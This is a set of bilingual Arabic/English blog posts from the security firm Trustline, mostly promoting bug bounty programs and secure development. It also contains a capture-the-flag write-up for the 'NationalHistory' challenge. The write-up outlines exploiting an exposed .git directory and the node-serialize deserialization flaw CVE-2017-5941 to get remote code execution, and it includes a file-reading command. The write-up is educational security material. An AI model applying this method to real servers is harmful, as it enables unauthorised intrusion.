مع وجود سوق تنافسي للمكافآت بتنوع في القيمة، يبقى الهدف الأساسي هو تعزيز الأمن السيبراني. لقد أوجدت ترست لاين فرصًا للباحثين الأمنيين لكسب مكافآت مجزية، مع تحسين أمن المنشئات في الوقت ذاته.

&nbsp;

<h2>الخرافة رقم 4: لا تعزز برامج مكافآت الثغرات الأمنية التواصل بين المطورين والباحثين الأمنيين</h2>

يعتبر التواصل الفعال ضروريًا لإصلاح الثغرات الأمنية، ويستفيد المطورون من التفاعل المباشر مع الباحثين الأمنيين. منصة ترست لاين تسهل ذلك من خلال السماح بتصنيف وتعيين الثغرات الأمنية والتكامل مع أدوات مثل Slack و Jira. يساعد هذا الاتصال السلس المؤسسات على ربط فرق التطوير والأمن والعمليات الخاصة بها بالباحثين الأمنيين الخارجيين، ما يعزز بيئة تعاونية لتحسين أمان التطبيقات مع مرور الوقت.

&nbsp;

<h2>الخرافة رقم 5: برامج مكافآت الثغرات الأمنية مخصصة فقط للشركات الكبيرة</h2>

برامج مكافآت الثغرات الأمنية ليست حكرًا على الشركات الكبيرة. يمكن للمؤسسات من أي حجم الاستفادة من هذه البرامج لتعزيز أمنها. تستطيع الشركات الصغيرة تحقيق مكاسب كبيرة من خلال الوصول إلى خبرات أمن المعلومات العالمية دون الحاجة إلى فريق داخلي كبير. تقدم ترست لاين حلولاً مرنة لجميع الميزانيات، ما يجعل الأمن السيبراني المتقدم في متناول الشركات الصغيرة والمتوسطة.

&nbsp;

من خلال كشف زيف هذه الخرافات، نأمل في تشجيع المزيد من المؤسسات على النظر إلى برامج مكافآت الثغرات الأمنية

&nbsp;

<h2>كيف ترست لاين تساعدك :</h2>

ترست لاين تربط مجتمع الهاكرز المحترفين مع المنشآت لحمايتهم من خلال توفير منصة متكاملة تهدف لإجراء اختبار أمني مستمر وشامل لاصول هذه الشركات. توفر المنصة منهجية تسلسلية واضحة ابتداء من اكتشاف الثغرة، وحتى إغلاقها يمكن الإطلاع عليها من خلال لوحة تحكم متكاملة. ترست لاين هي أول منصة اقتصاد تشاركي في مجال الأمن السيبراني في المنطقة، تابعونا على منصات التواصل الاجتماعي&nbsp;<a href="https://twitter.com/TrustlineSec">تويتر</a>، <a href="https://www.linkedin.com/company/trustlinesec/">لينكد ان</a>، لمعرفة آخر التحديثات و&nbsp;<a href="mailto:info@trustline.sa">تواصل معنا</a> إذا كان عندك الرغبة لحماية منشاتك وإطلاق برامجك الخاصه.

Debunking 5 Common Myths About Bug Bounties

5 خرافات شائعة حول برامج مكافآت الثغرات الأمنية

Debunking-5-Common-Myths-About-Bug-Bounties

Bug bounties are gaining popularity, but with that comes a slew of misconceptions. Let’s clear up some of these myths with insights from our team at Trustline.

تشهد برامج مكافآت الثغرات الأمنية  رواجًا متزايدًا، إلا أنها تصاحبها أيضًا مجموعة من المفاهيم والخرافات الخاطئة. دعونا نكشف عن زيف هذه الخرافات بالاستعانة بخبرة فريقنا في ترست لاين.

CISOs and security leaders face numerous challenges, including the skills gap, technical debt, and limited resources due to a challenging economic climate. This responsibility of safeguarding organizations is far from easy, leading to burnout among 74% of CISOs in the past year. To understand how security teams can thrive in such circumstances, we engaged in discussions with industry-diverse CISOs and security leaders. Through these conversations, we identified essential strategies. A recurring theme in our discussions was the utilization of ethical hackers by security leaders to address strains and challenges in their security programs. This collaboration with the hacker community offers cost reduction and validation of security controls as key benefits.

&nbsp;

<h2>Ethical Hackers: Strengthening Security</h2>

Ethical hackers not only provide additional testing skills but also offer insights on vulnerability identification and exploitation, enabling organizations to prevent recurring vulnerabilities. These conversations with hackers help organizations develop a comprehensive understanding of their attack surface, facilitating the identification of ways to strengthen defenses against various threats, be it through expertise, tools, or process changes.

&nbsp;

<h2>Uncovering Risks, Validating Security</h2>

Modern IT environments are complex and interconnected, making it impossible to anticipate all risks. Despite having robust IT operations, security practices, and CI/CD pipelines, gaps in knowledge, skills, or experience can lead security teams to overlook risks and threats. This is where the ethical hacking community plays a vital role. Continuously evaluating the attack surface, a diverse group of security experts significantly increases the chances of discovering unexpected weaknesses, allowing proactive remediation before cybercriminals exploit them. Additionally, hackers independently validate the effectiveness of security measures, helping organizations tighten or replace controls that underperform.

&nbsp;

<h2>Optimizing Resources: Engaging Hackers</h2>

Engaging with the ethical hacker community not only enhances security testing coverage but also offers cost and time savings. The breadth of testing skills available surpasses what can be retained in-house or obtained from penetration testing providers. Utilizing a single platform for a wide range of offensive security testing eliminates the need to onboard multiple vendors, resulting in significant time and cost savings.

&nbsp;

<h2>Building Trust: Vulnerability Disclosure Programs</h2>

Although some security leaders initially hesitated to collaborate with hackers due to concerns about exposing their organizations, working with the global hacking community has proven beneficial. Hacker-driven vulnerability disclosure and bug bounty programs substantially contribute to organizations&#39; security profiles, fostering higher levels of trust with customers and partners.

&nbsp;

<h2>Budget Strategies: Insights From Security Leaders</h2>

By inviting expert hackers to assess your assets, you can strengthen security controls and address gaps without waiting for real-world cyberattacks to occur. In navigating budget restrictions, insights from security leaders include talent management, budget balancing, risk management, and engaging ethical hackers as effective approaches to overcome financial constraints.

&nbsp;

Trustline is the first crowdsourced security platform in the region. Through community of hackers, networks and applications can be tested and protected using the latest strategies and techniques. If you would like to keep up on the latest news, follow us on social media&nbsp;<a href="http://twitter.com/TrustlineSec">Twitter</a>,&nbsp;<a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;and&nbsp;contact us&nbsp;today to explore our offerings.

يواجه قادة الأمن السيبراني والرؤساء التنفيذيين العديد من التحديات السيبرانية، بما فيها قلة توفر المهارات والموارد المتاحة في المجال السيبراني مما شكّل فجوة خطيرة تهدد أمن هذه المؤسسات. هذه المسؤولية لحماية المؤسسات لا تعد سهلة على الإطلاق، مما تسبب بالاحتراق الوظيفي لأكثر من ٧٤٪ من القادة التنفيذين في أمن المعلومات. لفهم كيف يمكن التغلب على هذه الظروف، شاركنا في مناقشات مع هؤلاء القادة التنفيذيين في العديد من المؤسسات لمعرفة كيف يمكن إيجاد حلول فعّالة لهذه التحديات. من خلال هذه المناقشات، توصّلنا إلى استراتيجيات معينة للتغلب على هذه التحديات. من أبرز هذه الاستراتيجيات كانت استخدام الهاكرز الأخلاقيين لإيجاد الثغرات والتغلب على التحديات التي يواجهونها. حيث يساهم التعاون مع مجتمع الهاكرز الأخلاقيين في سد فجوة عدم توافر بعض المهارات اللازمة ومحدودية الموارد.

&nbsp;

<h2 dir="rtl">الهاكرز الأخلاقيين</h2>

الاستعانة بالهاكرز الأخلاقيين لا تساهم فقط في توفير مهارات إضافية لإيجاد الثغرات المحتمل استغلالها من قبل المجرمين السيبرانيين، بل يقدمون أيضا رؤية مختلفة تساعد المؤسسات في معرفة نقاط ضعفها من خلال اختبارات اختراق محاكية لواقع الهجمات السيبرانية. أيضًا يقدمون اقتراحات لإصلاح هذه الثغرات مما يساعد في تعزيز حماية الأصول الرقمية للمؤسسة.

&nbsp;

<h2 dir="rtl">البيئة الرقمية الحديثة</h2>

إيجاد جميع الثغرات وإصلاحها في البيئة الرقمية الحديثة يعد معقدًا جدًا. حيث يمكن أن تغفل فرق الأمن في المؤسسات عن بعض الثغرات الخطيرة التي تهدد أمنها السيبراني. هنا يأتي دور مجتمع الهاكرز الأخلاقيين ليلعب دورًا مهمًا في حماية الأصول الرقمية للمؤسسات، عن طريق إيجاد الثغرات وتقديم تقارير مفصلة عن كيفية معالجة هذه الثغرات مما يسمح بمعالجة استباقية لتدعيم الأمان قبل أن يستغلها المجرمون السيبرانيون.

&nbsp;

<h2 dir="rtl">تعزيز الموارد عن طريق إشراك الهاكرز الأخلاقيين</h2>

التعاون مع مجتمع الهاكرز الأخلاقيين لا يساهم فقط في تعزيز كفاءة اختبارات الأمان، بل يوفر أيضًا في التكلفة والوقت. حيث ان المهارات الضرورية لاختبارات الاختراق الشاملة تفوق ما يمكن الاحتفاظ به في مؤسسة واحدة أو الحصول عليه من قبل مقدمي اختبارات الاختراق. لهذا التعاون مع مجتمع الهاكرز يضمن توفر جميع المهارات اللازمة لاختبارات اختراق شاملة، ويلغي الحاجة إلى الحصول عليها من عدة مقدمي اختبارات اختراق.

&nbsp;

<h2 dir="rtl">بناء الثقة</h2>

برامج الإفصاح عن الثغرات توفر للهاكرز إمكانية الإبلاغ عن الثغرات التي يجدونها بكل أمان. على الرغم من تردد بعض المؤسسات في التعامل مع الهاكرز، بسبب بعض التحفظات من إظهار معلوماتهم للهاكرز، فقد اثبت التعاون مع مجتمع الهاكرز الأخلاقيين عن طريق برامج مكافأة الثغرات، فعاليته من خلال الكشف عن الكثير من الثغرات الخطيرة التي تغفل عنها فرق الأمن السيبراني في هذه المؤسسات.

&nbsp;

<h2 dir="rtl">التغلب على التحديات المالية</h2>

أكد الكثير من القادة التنفيذيين في العديد من المؤسسات العالمية فعالية التعاون مع مجتمع الهاكرز في تقليل تكاليف أمنهم السيبراني. حيث يساهم هذا التعاون الذي يكافئ الهاكرز على كل ثغره يجدونها في أصولهم الرقمية في توفير تكاليف عالية مقارنة بالدفع مقابل المجهود والوقت لمقدمي خدمات اختبار الاختراق التقليدية.

&nbsp;

ترست لاين تساهم في رفع مستوى الامان لدى المنشات من خلال ربطهم مع مجتمع من الباحثين الامنيين حيث توفر منصة متكاملة تهدف لإجراء اختبار أمني مستمر وشامل لاصولهم الرقمية. إذا كنت ترغب في متابعة آخر الأخبار، يمكنك متابعتنا على وسائل التواصل الاجتماعي مثل <a href="http://twitter.com/TrustlineSec">تويتر</a> و<a href="http://www.linkedin.com/company/trustlinesec/">لينكد إن</a>، ويمكنك التواصل معنا للاطلاع على حلولنا.

&nbsp;

How-Hackers-Are-Helping-Security-Leaders-Navigate-the-Budget-Crunch

CISOs and security leaders face numerous challenges, including the skills gap, technical debt, and limited resources.

يواجه قادة الأمن السيبراني والرؤساء التنفيذيين العديد من التحديات السيبرانية، بما فيها قلة توفر المهارات والموارد المتاحة في المجال السيبراني مما شكّل فجوة خطيرة تهدد أمن هذه المؤسسات.

How Hackers Are Helping Security Leaders Navigate the Budget Crunch

كيف يساعد الهاكرز في التغلب على التحديات المالية التي تواجه المؤسسات في أمنها السيبراني

<h2>&nbsp;Challenge overview:</h2>

This report details a sophisticated security assessment leading to the identification and exploitation of a deserialization vulnerability within a Node.js application. The vulnerability, identified as CVE-2017-5941, was discovered through meticulous analysis of the application&#39;s deployment and version control history. This analysis underscores the critical importance of secure coding practices and the diligent management of sensitive information within version control systems. The initial phase of the assessment involved the use of Gobuster, revealing the presence of an exposed .git directory. Subsequent utilization of git-dumper facilitated the extraction of this directory, unveiling significant oversight by the development team, including the exposure of both private and public cryptographic keys within commit histories.

<h2>Technical approach:</h2>

<ul>
	<li>Tools Used: Gobuster, git-dumper</li>
	<li>Skills/Knowledge Required: Understanding of git version control, familiarity with deserialization vulnerabilities</li>
	<li>Objectives: Identify and exploit a deserialization vulnerability within a Node.js application</li>
	<li>Scenario: Analysis of deployment and version control history revealed a deserialization vulnerability (CVE-2017-5941) in a Node.js application. Exposed .git directory led to the extraction of private and public cryptographic keys within commit histories.</li>
</ul>

The technical approach involved several key steps:

<ol>
	<li>Gobuster Analysis:</li>
	<li>Git-dumper Extraction:</li>
	<li>Review Commit History:</li>
	<li>Local Site Run:</li>
	<li>Private Key Integration:</li>
	<li>Analysis of Vulnerable Library:</li>
	<li>Crafting Python Script:</li>
	<li>Replication of Exploitation:</li>
	<li>Real Server Exploitation:</li>
</ol>

Utilized Gobuster to identify the presence of an exposed .git directory. 

<img alt="" src="/media/blog/2024/02/11/brave_hprbwoxzz8_L3GmOZf.png" style="height:332px; width:849px" />

Employed git-dumper to extract the .git folder. 

<img alt="" src="/media/blog/2024/02/11/brave_nfzgodmhm9.png" style="height:376px; width:850px" />

Extracted .git folder to review commit history, leading to the discovery of private and public keys. 

<img alt="" src="/media/blog/2024/02/11/brave_ghrp7xv8yt.png" style="height:460px; width:848px" />

I found a private key on git commit

<img alt="" src="/media/blog/2024/02/11/brave_kkgt2bvocn.png" style="height:418px; width:850px" />

I found public key on git commit

<img alt="" src="/media/blog/2024/02/11/brave_qemkxnvt1g.png" style="height:418px; width:850px" />

Attempted to run the site locally to assess its behavior.

<img alt="" src="/media/blog/2024/02/11/brave_kgl63snjvc.png" style="height:433px; width:849px" />

Integrated the private key into a file and reran the Docker to ensure proper functionality.

<img alt="" src="/media/blog/2024/02/11/brave_pl9raxhcfx.png" style="height:511px; width:849px" />

Identified the usage of the vulnerable Node.js library, node-serialize, susceptible to deserialization attacks enabling remote code execution (RCE).

<img alt="" src="/media/blog/2024/02/11/brave_w5t2nlw50e.png" style="height:513px; width:850px" />

Developed a Python script to manipulate the application&#39;s cookie handling mechanism, leveraging the public key to encrypt a payload triggering the deserialization vulnerability.

<img alt="" src="/media/blog/2024/02/11/brave_q8krvyge3i.png" style="height:482px; width:850px" />

Successfully replicated local exploitation against the production environment, achieving unauthorized code execution.

<img alt="" src="/media/blog/2024/02/11/brave_a1w1o5vqsm.png" style="height:513px; width:849px" />

Attempted the same steps on the real server, resulting in Remote Code Execution.

<img alt="" src="/media/blog/2024/02/11/brave_dzsghagqc1.png" style="height:480px; width:850px" />

We have got a Remote Code Execution on the server

<img alt="" src="/media/blog/2024/02/11/brave_go6qgk5x75.png" style="height:484px; width:848px" />

Know to get the flag just replace id with cat /app/flag.txt &gt; /public/img/flag.txt

&nbsp;

<h2>Conclusion:</h2>

The discovery and exploitation of the CVE-2017-5941 vulnerability within the Node.js application demonstrate significant risks associated with insecure deserialization and the inadequate protection of sensitive information within version control systems. This case study highlights the necessity for rigorous security practices, including secure coding, regular dependency audits, and the secure management of cryptographic keys.&nbsp;

&nbsp;

<h2 dir="rtl">نظرة عامة على التحدي:</h2>

يوضح هذا التقرير تقييمًا أمنيًا متطورًا يؤدي إلى تحديد واستغلال ثغرة في التسلسل داخل تطبيق Node.js. تم اكتشاف الثغرة، المعروفة باسم CVE-2017-5941، من خلال تحليل دقيق لتاريخ نشر التطبيق والتحكم في الإصدارات. يؤكد هذا التحليل أهمية تقنيات البرمجة الآمنة وإدارة المعلومات الحساسة بعناية داخل أنظمة التحكم في الإصدارات. دراسة المرحلة الأولية للتقييم شملت استخدام Gobuster، مما كشف عن وجود دليل .git مكشوف. استخدمت git-dumper بعد ذلك لاستخراج هذا الدليل، مما كشف عن إهمال كبير من قبل فريق التطوير، بما في ذلك تعريض المفاتيح التشفيرية الخاصة والعامة داخل تاريخ الالتزامات.

&nbsp;

<h2 dir="rtl">النهج التقني:</h2>

<ul dir="rtl">
	<li>الأدوات المستخدمة: Gobuster، git-dumper</li>
	<li>المهارات/المعرفة المطلوبة: فهم التحكم بإصدارات git، والمعرفة بالثغرات في عمليات التسلسل</li>
	<li>الأهداف: تحديد واستغلال ثغرة في عملية التسلسل داخل تطبيق Node.js </li>
	<li>السيناريو: أظهر تحليل تاريخ النشر والتحكم في الإصدارات وجود ثغرة في التسلسل (CVE-2017-5941) في تطبيق Node.js. أدى الدليل .git المكشوف إلى استخراج المفاتيح التشفيرية الخاصة والعامة داخل تاريخ الالتزامات.</li>
</ul>

النهج التقني شمل عدة خطوات رئيسية:

<ol dir="rtl">
	<li>تحليل Gobuster: </li>
	<li>استخدم git-dumper لاستخراج مجلد .git.</li>
	<li>مراجعة تاريخ الالتزامات: </li>
	<li>تشغيل الموقع محليًا: </li>
	<li>دمج المفتاح الخاص: </li>
	<li>تحليل المكتبة الضعيفة الأمان: </li>
	<li>تصميم نص برمجي بلغة Python: </li>
	<li>تكرار استغلال الثغرة: </li>
	<li>استغلال الخادم الحقيقي:</li>
</ol>

استخدمت Gobuster لتحديد وجود دليل .git مكشوف.

<img alt="" src="/media/blog/2024/02/11/brave_hprbwoxzz8_L3GmOZf.png" style="height:332px; width:849px" />

استخدمت git-dumper لاستخراج مجلد .git.

<img alt="" src="/media/blog/2024/02/11/brave_nfzgodmhm9.png" style="height:376px; width:850px" />

استخرجت مجلد .git لمراجعة تاريخ الاستحداث، مما أدى إلى اكتشاف المفاتيح السرية والعامة.

<img alt="" src="/media/blog/2024/02/11/brave_ghrp7xv8yt.png" style="height:460px; width:848px" />

لقد وجدت مفتاحًا خاصًا في استحداث git

<img alt="" src="/media/blog/2024/02/11/brave_kkgt2bvocn.png" style="height:418px; width:850px" />

لقد وجدت مفتاحًا عامًا في استحداث git

<img alt="" src="/media/blog/2024/02/11/brave_qemkxnvt1g.png" style="height:418px; width:850px" />

حاولت تشغيل الموقع محليًا لتقييم سلوكه.

<img alt="" src="/media/blog/2024/02/11/brave_kgl63snjvc.png" style="height:433px; width:849px" />

دمجت المفتاح الخاص في ملف وأعدت تشغيل Docker للتأكد من الوظائف السليمة.

<img alt="" src="/media/blog/2024/02/11/brave_pl9raxhcfx.png" style="height:511px; width:849px" />

تم التعرف على طريقة&nbsp;استخدام مكتبة&nbsp;ضعيفة الأمن Node.js، node-serialize، التي تتعرض لهجمات التسلسل مما يمكن من تنفيذ الشفرة عن بعد (RCE).

<img alt="" src="/media/blog/2024/02/11/brave_w5t2nlw50e.png" style="height:513px; width:850px" />

طوّرت نص Python لتلاعب في آلية معالجة الكوكيز للتطبيق، باستخدام المفتاح العام لتشفير حمولة تنشّط ثغرة التسلسل.

<img alt="" src="/media/blog/2024/02/11/brave_q8krvyge3i.png" style="height:482px; width:850px" />

نجحت في تكرار لاستغلال المحلي ضد بيئة الإنتاج بنجاح، محققة تنفيذ شفرة غير مصرّح به.

<img alt="" src="/media/blog/2024/02/11/brave_a1w1o5vqsm.png" style="height:513px; width:849px" />

حاولت نفس الخطوات على الخادم الحقيقي، مما أدى إلى تنفيذ الشفرة عن بعد.

<img alt="" src="/media/blog/2024/02/11/brave_dzsghagqc1.png" style="height:480px; width:850px" />

لقد حصلنا على تنفيذ الشفرة عن بعد على الخادم

<img alt="" src="/media/blog/2024/02/11/brave_go6qgk5x75.png" style="height:484px; width:848px" />

الآن للحصول على العلم، قم ببساطة باستبدال &quot;id&quot; بـ &quot;cat /app/flag.txt &gt; /public/img/flag.txt&quot;

&nbsp;

<h2 dir="rtl">الاستنتاج: </h2>

يظهر اكتشاف واستغلال ثغرة CVE-2017-5941 داخل تطبيق Node.js المخاطر الكبيرة المرتبطة بالتسلسل غير الآمن وعدم حماية المعلومات الحساسة داخل النظم

NationalHistory-Challenge

This write-up documents a challenge focused on exploiting a deserialization vulnerability within a Node.js application (CVE-2017-5941). It follows the journey of identifying and exploiting this vulnerability, starting from the initial analysis using Gobuster and git-dumper to uncover the exposed .git directory, leading to the extraction of cryptographic keys. The technical approach involves various steps, including reviewing commit history, running the site locally, integrating private keys, ana

تحدي NationalHistory تحدياً مركزاً حول استغلال ثغرة في عملية التسلسل داخل تطبيق Node.js (CVE-2017-5941). تتبع رحلة تحديد واستغلال هذه الثغرة، بدءًا من التحليل الأولي باستخدام Gobuster و git-dumper لكشف الدليل .git المكشوف، مما أدى إلى استخراج المفاتيح التشفيرية. يتضمن النهج التقني خطوات مختلفة، بما في ذلك مراجعة تاريخ الالتزامات، وتشغيل الموقع محليًا، ودمج المفاتيح الخاصة، وتحليل المكتبات ضعيفة الأمان، وصياغة نص برمجي بلغة Python.

NationalHistory Challenge Writeup

حل تحدي NationalHistory

In today&rsquo;s digital age, organizations face a growing number of cyber threats. From data breaches to ransomware attacks, the consequences of weak security practices are not only damaging to an organization&#39;s reputation but can also lead to significant financial losses. Integrating security into the software development lifecycle (SDLC) is essential to safeguard businesses from costly breaches and cyberattacks. Secure software development is no longer an option&mdash;it&rsquo;s a critical strategy to prevent vulnerabilities from being exploited by malicious actors.

&nbsp;

<h2>The High Stakes of Insecure Software</h2>

When security is neglected during software development, organizations are left vulnerable to threats. Cybercriminals actively look for flaws in software to exploit, and once they find one, the damage can be extensive. The cost of responding to a cyberattack is often significantly higher than what it would have taken to prevent it from the outset. Data breaches result in financial penalties, loss of customer trust, and expensive recovery processes.

Insecure software is a risk that no organization can afford to ignore. By failing to address security during development, organizations not only open themselves up to cyberattacks but also to regulatory fines and operational disruption.

&nbsp;

<h2>Embedding Security Early in the SDLC</h2>

A proactive security strategy involves &mdash;integrating security practices early in the SDLC. This approach ensures that security is considered at every stage, from design to deployment, and helps identify vulnerabilities before they reach production. Embedding security early reduces the likelihood of critical security flaws making it into the final product, thereby minimizing the risk of exploitation.

With Trustline Review, organizations can take their code review process to the next level. Trustline Review is a continuous, cloud-based service that utilizes both automated tools and expert manual analysis to identify and mitigate vulnerabilities in software code, ensuring compliance and enhancing security practices. Scope, schedule, and manage your code review process through the Trustline platform, collaborating with our network of background-checked, skills-vetted engineers who scour your source code for security flaws. By leveraging this service, companies can reduce the risk of vulnerabilities slipping through the cracks.

&nbsp;

<h2>The Cost Benefits of Secure Development</h2>

While investing in secure software development may seem costly upfront, the long-term savings are substantial. Fixing security vulnerabilities during the development phase is far more cost-effective than addressing them after deployment. In fact, studies show that remediating issues post-production can be up to 30 times more expensive.

&nbsp;

<h2>Security and Compliance</h2>

Secure software development also plays a crucial role in maintaining regulatory compliance. Regulations like GDPR and HIPAA require organizations to implement robust security measures to protect sensitive data. Failure to comply with these regulations can result in substantial fines and legal liabilities. By embedding security practices throughout the SDLC, organizations can demonstrate their commitment to compliance while also avoiding the penalties associated with data breaches.

&nbsp;

<h2>How Trustline Can Help</h2>

Trustline offers a comprehensive suite of products designed to elevate your software security efforts and protect your organization from costly breaches:

<ul>
	<li>Trustline Review: Our Secure Code Review as a Service is a continuous, cloud-based offering that combines automated tools with expert manual analysis to identify and mitigate vulnerabilities in your software code. This service not only enhances your security practices but also ensures compliance with industry standards. With Trustline Review, you can scope, schedule, and manage your code review process efficiently while collaborating with our network of background-checked, skills-vetted engineers who meticulously examine your source code for security flaws.</li>
	<li>Trustline Disclosure: Trustline Disclosure is our Vulnerability Disclosure Program (VDP), providing a structured method for reporting vulnerabilities in a secure and clear process. By implementing this program, you demonstrate your commitment to cybersecurity, building trust among your stakeholders and the wider community. Let everyone know how serious you are about security and take a proactive stance in elevating your cybersecurity posture.</li>
	<li>Trustline Bounty: Trustline Bounty is our Bug Bounty Program, offering financial incentives to ethical hackers who successfully identify and report vulnerabilities. This program allows companies to tap into the expertise of ethical hackers and security researchers, who continuously test your systems for flaws that may be overlooked by traditional security techniques. With ongoing security testing powered by hacker insights, you can enhance your system&#39;s defenses and stay ahead of emerging threats.</li>
	<li>Trustline Assessment: Trustline Assessment offers Pentest as a Service (PTaaS), a SaaS model approach for managing and coordinating penetration testing activities. Pentests involve authorized simulated cyberattacks conducted by skilled security professionals to identify and evaluate the severity of vulnerabilities within your organization&rsquo;s attack surface. PTaaS solutions allow you to scope, schedule, and manage your pentests through a SaaS-like platform, and match you with highly vetted testers. This timeboxed, methodology-driven activity helps ensure your systems are rigorously tested and fortified against potential attacks.</li>
</ul>

By integrating these Trustline services into your development process, your organization can confidently build secure software, reduce the risk of breaches, and maintain compliance with industry regulations. Trustline helps you prioritize security at every stage, protecting your business from the financial and reputational damage of cyberattacks.

&nbsp;

If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;and <a href="mailto:info@trustline.sa">contact us</a> to use the cybersecurity Challenges that you might face into Powerful Growth Opportunities for your company

في عصرنا الرقمي الحالي، تواجه المنظمات عددًا متزايدًا من التهديدات السيبرانية. من اختراقات البيانات إلى هجمات الفدية، فإن عواقب ممارسات الأمن الضعيفة ليست فقط ضارة بسمعة المنظمة ولكن يمكن أن تؤدي أيضًا إلى خسائر مالية كبيرة. يعد دمج الأمن في دورة حياة تطوير البرمجيات أمرًا ضروريًا لحماية الشركات من الثغرات الأمنية المكلفة و الهجمات السيبرانية. لم يعد تطوير البرمجيات الآمن خيارًا - بل هو استراتيجية حاسمة لمنع استغلال الثغرات الأمنية من قبل الهاكرز.

&nbsp;

<h2>المخاطر العالية للبرمجيات الغير آمنة</h2>

عندما يتم إهمال الأمن أثناء دورة حياة تطوير البرمجيات، تتعرض المنظمات للتهديدات. يبحث المجرمين السيبرانيين عن عيوب وثغرات في البرمجيات لاستغلالها، وبمجرد العثور على واحدة، يمكن أن تكون الأضرار كبيرة. غالبًا ما تكون تكلفة الاستجابة لهجوم سيبراني أعلى بكثير مما كان سيكلف لمنعها من البداية. تؤدي انتهاكات البيانات إلى عقوبات مالية، وفقدان ثقة العملاء، وعمليات استرداد مكلفة.

لا يمكن لأي منظمة تحمل المخاطر التي تشكلها البرمجيات الغير آمنة. من خلال عدم معالجة الأمن أثناء التطوير، لا تعرض المنظمات نفسها للهجمات السيبرانية فحسب، بل أيضًا للغرامات التنظيمية والاضطرابات التشغيلية.

&nbsp;

<h2>تضمين الأمن في وقت مبكر في دورة حياة تطوير البرمجيات</h2>

تتضمن استراتيجية الأمن الاستباقية - دمج ممارسات الأمن في وقت مبكر في دورة حياة تطوير البرمجيات. يضمن هذا النهج مراعاة الأمن في كل مرحلة، من التصميم إلى مرحلة النشر، ويساعد في تحديد الثغرات الأمنية قبل وصولها إلى مرحلة النشر. يؤدي تضمين الأمن في وقت مبكر إلى تقليل احتمال وجود ثغرات أمنية خطيرة في المنتج النهائي، مما يقلل من خطر استغلال المجرمين السيبرانيين لهذه الثغرات.

باستخدام &laquo;ترست لاين ريفيو&raquo;، يمكن للمنظمات الارتقاء بعملية مراجعة الكود البرمجي إلى مستوى آخر. &laquo;ترست لاين ريفيو&raquo; هي خدمة مستمرة&nbsp; تستخدم كل من الأدوات الآلية والتحليل اليدوي لتحديد الثغرات الأمنية في الأكواد البرمجية، مما يضمن الامتثال ويعزز ممارسات الأمن. حدد نطاق عملية مراجعة الأصول البرمجية الخاصة بك، وجدولها، من خلال منصة ترست لاين، بالتعاون مع شبكتنا من الخبراء الأمنيين الذين تم التحقق من خلفيتهم وفحص مهاراتهم، والذين يبحثون في مصادر الأكواد البرمجية الخاص بك عن الثغرات الأمنية. من خلال الاستفادة من هذه الخدمة، يمكن للشركات تقليل عدد وخطورة الثغرات الأمنية الخاصة بك.

&nbsp;

<h2>الفوائد والتكلفة للتطوير الآمن</h2>

في حين أن الاستثمار في تطوير البرمجيات الآمن قد يبدو مكلفًا في البداية، فإن المكاسب والفوائد طويلة الأجل كبيرة. يعد إصلاح الثغرات الأمنية أثناء مرحلة التطوير تعد أكثر فعالية من حيث التكلفة من معالجتها بعد مرحلة الإنتاج. في الواقع، تظهر الدراسات أن إصلاح المشكلات بعد مرحلة الإنتاج يمكن أن تكون أكثر تكلفة بنسبة 30 ضعفاً

&nbsp;

<h2>الأمن و الامتثال للتشريعات التنظيمية</h2>

يلعب تطوير البرمجيات الآمن أيضًا دورًا مهمًا في الحفاظ على الامتثال التنظيمي. تتطلب اللوائح مثل اللائحة العامة لحماية البيانات&nbsp;من المنظمات تنفيذ تدابير أمنية قوية لحماية البيانات الحساسة. يمكن أن يؤدي عدم الامتثال لهذه اللوائح إلى غرامات كبيرة والتزامات قانونية. من خلال تضمين ممارسات الأمن في جميع مراحل دورة حياة تطوير البرمجيات، يمكن للمنظمات إثبات التزامها بالامتثال مع تجنب العقوبات المرتبطة بانتهاكات البيانات.

&nbsp;

<h2>كيف يمكن لـ ترست لاين المساعدة</h2>

توفر ترست لاين مجموعة شاملة من المنتجات المصممة لرفع مستوى أمان البرمجيات الخاصة بك وحماية منظمتك من الثغرات الأمنية المكلفة:

<ul>
	<li>ترست لاين ريفيو: خدمة مراجعة الأكواد البرمجية، هذه الخدمة تجمع بين الأدوات الآلية والتحليل اليدوي من قبل الخبراء لتحديد ومعالجة الثغرات الأمنية في مصدر الأكواد البرمجية لأصولك الرقمية. هذه الخدمة لا تعزز فقط ممارسات الأمان الخاصة بك، ولكنها تضمن أيضًا الامتثال للمعايير التنظيمية. مع ترست لاين ريفيو، يمكنك تحديد نطاق ومواعيد وإدارة عملية مراجعة مصدر الأكواد البرمجية الخاص بك بكفاءة، بالتعاون مع شبكتنا من المهندسين ذوي الكفاءات العالية الذين يفحصون أكوادك البرمجية بعناية للبحث عن الثغرات الأمنية.</li>
	<li>ترست لاين دسكلوجر: ترست لاين ديسكلوجر هو برنامج الإفصاح عن الثغرات، الذي يوفر طريقة منظمة للهاكرز الأخلاقيين للإبلاغ عن الثغرات الي تتعلق بعلامتك التجارية بطريقة آمنة وواضحة. من خلال تنفيذ هذا البرنامج، يمكنك إثبات التزامك بالأمن السيبراني، وبناء الثقة بين أصحاب المصلحة والمجتمع بشكل عام.</li>
	<li>ترست لاين باونتي: ترست لاين باونتي هو برنامج مكافآت الثغرات الأمنية الخاص بنا، الذي يوفر حوافز مالية للهاكرز الذين ينجحون في تحديد والإبلاغ عن الثغرات الأمنية. يتيح هذا البرنامج للشركات الاستفادة من خبرات الهاكرز الأخلاقيين والباحثين في مجال الأمن السيبراني، الذين يقومون بشكل مستمر باختبار أنظمتك للعثور على العيوب التي قد لا تكتشفها التقنيات الأمنية التقليدية. من خلال الاختبار والتحليل المستمر للأمان بدعم من رؤى الهاكرز، يمكنك تعزيز دفاعات نظامك والبقاء متقدماً على التهديدات المتجددة.</li>
